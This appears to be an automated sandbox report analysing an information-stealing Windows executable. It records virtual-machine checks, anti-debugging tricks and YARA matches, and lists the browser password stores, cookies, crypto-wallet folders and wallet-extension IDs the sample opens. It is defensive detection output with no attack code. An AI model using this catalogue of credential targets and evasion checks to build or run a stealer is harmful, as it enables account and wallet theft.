                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                    Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.14.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                    Source: Amcache.hve.14.drBinary or memory string: VMware VMCI Bus Device
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                    Source: Amcache.hve.14.drBinary or memory string: VMware Virtual RAM
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                    Source: Amcache.hve.14.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                    Source: Amcache.hve.14.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.14.drBinary or memory string: VMware Virtual USB Mouse
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                    Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.14.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.14.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.14.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.14.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.14.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3055237243.00000000044B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhZ
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                    Source: Amcache.hve.14.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                    Source: Amcache.hve.14.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1835336290.00000000044C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
                    Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.14.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                    Source: Amcache.hve.14.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.14.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                    Source: Amcache.hve.14.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeAPI call chain: ExitProcess graph end nodegraph_0-70801

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004244E4 NtSetInformationThread 000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC640_2_004244E4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-70885
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSystem information queried: KernelDebuggerInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeProcess queried: DebugFlagsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044E33B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00422177 mov eax, dword ptr fs:[00000030h]0_2_00422177
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00443998 mov ecx, dword ptr fs:[00000030h]0_2_00443998
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041F9A4 mov eax, dword ptr fs:[00000030h]0_2_0041F9A4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004262A1 mov eax, dword ptr fs:[00000030h]0_2_004262A1
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0043B362 mov eax, dword ptr fs:[00000030h]0_2_0043B362
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0044FB15 mov eax, dword ptr fs:[00000030h]0_2_0044FB15
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004244E4 mov eax, dword ptr fs:[00000030h]0_2_004244E4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004224A3 mov eax, dword ptr fs:[00000030h]0_2_004224A3
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004245EC mov eax, dword ptr fs:[00000030h]0_2_004245EC
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00421EEB mov eax, dword ptr fs:[00000030h]0_2_00421EEB
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00422817 mov eax, dword ptr fs:[00000030h]0_2_00422817
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041F916 mov eax, dword ptr fs:[00000030h]0_2_0041F916
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004269E4 mov eax, dword ptr fs:[00000030h]0_2_004269E4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]0_2_00424995
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]0_2_00424995
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00426A42 mov eax, dword ptr fs:[00000030h]0_2_00426A42
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0042F265 mov eax, dword ptr fs:[00000030h]0_2_0042F265
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00424B24 mov eax, dword ptr fs:[00000030h]0_2_00424B24
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041EBEB mov eax, dword ptr fs:[00000030h]0_2_0041EBEB
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00424BED mov eax, dword ptr fs:[00000030h]0_2_00424BED
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00424C8D mov eax, dword ptr fs:[00000030h]0_2_00424C8D
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041E6F0 mov eax, dword ptr fs:[00000030h]0_2_0041E6F0
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00429EF7 mov eax, dword ptr fs:[00000030h]0_2_00429EF7
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_02778D5B push dword ptr fs:[00000030h]0_2_02778D5B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0421FC0B mov eax, dword ptr fs:[00000030h]0_2_0421FC0B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04226C4B mov eax, dword ptr fs:[00000030h]0_2_04226C4B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04226CA9 mov eax, dword ptr fs:[00000030h]0_2_04226CA9
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0422F4CC mov eax, dword ptr fs:[00000030h]0_2_0422F4CC
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04226508 mov eax, dword ptr fs:[00000030h]0_2_04226508
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0424FD7C mov eax, dword ptr fs:[00000030h]0_2_0424FD7C
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04224D8B mov eax, dword ptr fs:[00000030h]0_2_04224D8B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04200D90 mov eax, dword ptr fs:[00000030h]0_2_04200D90
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0423B5C9 mov eax, dword ptr fs:[00000030h]0_2_0423B5C9
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0421EE52 mov eax, dword ptr fs:[00000030h]0_2_0421EE52
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04224E54 mov eax, dword ptr fs:[00000030h]0_2_04224E54
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04224EF4 mov eax, dword ptr fs:[00000030h]0_2_04224EF4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0422270A mov eax, dword ptr fs:[00000030h]0_2_0422270A
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0422474B mov eax, dword ptr fs:[00000030h]0_2_0422474B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04224853 mov eax, dword ptr fs:[00000030h]0_2_04224853
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0420092B mov eax, dword ptr fs:[00000030h]0_2_0420092B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04222152 mov eax, dword ptr fs:[00000030h]0_2_04222152
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0421E957 mov eax, dword ptr fs:[00000030h]0_2_0421E957
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0422A15E mov eax, dword ptr fs:[00000030h]0_2_0422A15E
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04222A7E mov eax, dword ptr fs:[00000030h]0_2_04222A7E
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0421FB7D mov eax, dword ptr fs:[00000030h]0_2_0421FB7D
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04243BFF mov ecx, dword ptr fs:[00000030h]0_2_04243BFF
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04224BFC mov eax, dword ptr fs:[00000030h]0_2_04224BFC
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04224BFC mov eax, dword ptr fs:[00000030h]0_2_04224BFC
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042223DE mov eax, dword ptr fs:[00000030h]0_2_042223DE
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0043323B GetProcessHeap,CreateDCW,GetSystemMetrics,GetSystemMetrics,DeleteDC,0_2_0043323B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044E33B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0043D3A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043D3A0
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0043CE89 SetUnhandledExceptionFilter,0_2_0043CE89
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0043CE95 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043CE95
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0424E5A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0424E5A2
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0423D607 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0423D607
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0423D0FC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0423D0FC
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0043D0B8 cpuid 0_2_0043D0B8
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0044614F GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0044614F
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00402476 GetComputerNameW,GetUserNameW,0_2_00402476
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00453BC4 GetTimeZoneInformation,0_2_00453BC4
                    Source: Amcache.hve.14.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.14.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.14.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.14.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.3.I5jG2Os8GA.exe.4280000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.I5jG2Os8GA.exe.4280000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5jG2Os8GA.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5jG2Os8GA.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.1263036918.0000000004280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: I5jG2Os8GA.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: I5jG2Os8GA.exeString found in binary or memory: %appdata%\Electrum\wallets
                    Source: I5jG2Os8GA.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                    Source: I5jG2Os8GA.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: I5jG2Os8GA.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3059014580.00000000051D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3059014580.00000000051D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum
                    Source: I5jG2Os8GA.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3059014580.00000000051D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcoblJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
